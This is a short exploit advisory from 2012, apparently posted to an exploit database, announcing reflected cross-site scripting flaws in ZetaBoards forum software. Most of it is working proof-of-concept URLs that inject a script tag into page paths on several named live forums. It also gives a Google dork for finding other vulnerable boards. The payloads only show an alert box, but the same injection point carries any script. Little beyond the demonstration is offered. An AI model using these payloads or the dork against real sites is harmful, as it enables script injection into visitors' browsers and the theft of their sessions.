# Exploit Title: ZetaBoards Cross Site Scripting # Date: 6.03.2012 # Author: Sony # Software Link: http://www.zetaboards.com/ # Google Dorks: intext:Hosted for free by ZetaBoards # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html .................................................................. Well, we have a multiple cross site scripting vulnerabilities on ZetaBoards. Who use ZetaBoards? http://www.zetaboards.com/directory/ The ZetaBoards Forum Directory contains 55,882 boards. (c) Demo: http://if.invisionfree.com/index/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://4.bp.blogspot.com/-hNc74z9U8Ak/T1ZYo20Qi5I/AAAAAAAAAsU/FvA7uSkQ1E4/s1600/forum2.JPG http://nintendo-forums.com/calendar/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://2.bp.blogspot.com/-ny-FA_k5lIQ/T1ZY0NiZjOI/AAAAAAAAAsg/Wu1dk3V5QFg/s1600/forum1.JPG http://support.zetaboards.com/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://2.bp.blogspot.com/--2qVcuCeRy0/T1ZZAgL3hPI/AAAAAAAAAss/G6N1fFs29OI/s1600/forum3.JPG http://support.zetaboards.com/login/lostpw/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://4.bp.blogspot.com/-SOIbojMMsyE/T1ZZOtjJCII/AAAAAAAAAs4/3D_Mpe3Pm-Q/s1600/forum4.JPG http://sonicblast.org/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E http://2.bp.blogspot.com/-zA3ibj72U9E/T1ZZbE7F5xI/AAAAAAAAAtE/w74HmHtYaU8/s1600/forum5.JPG Video: http://www.youtube.com/watch?v=ZGvwY9z3ZYA .................................................................. InSecurity.Ro Because we care, we're security aware!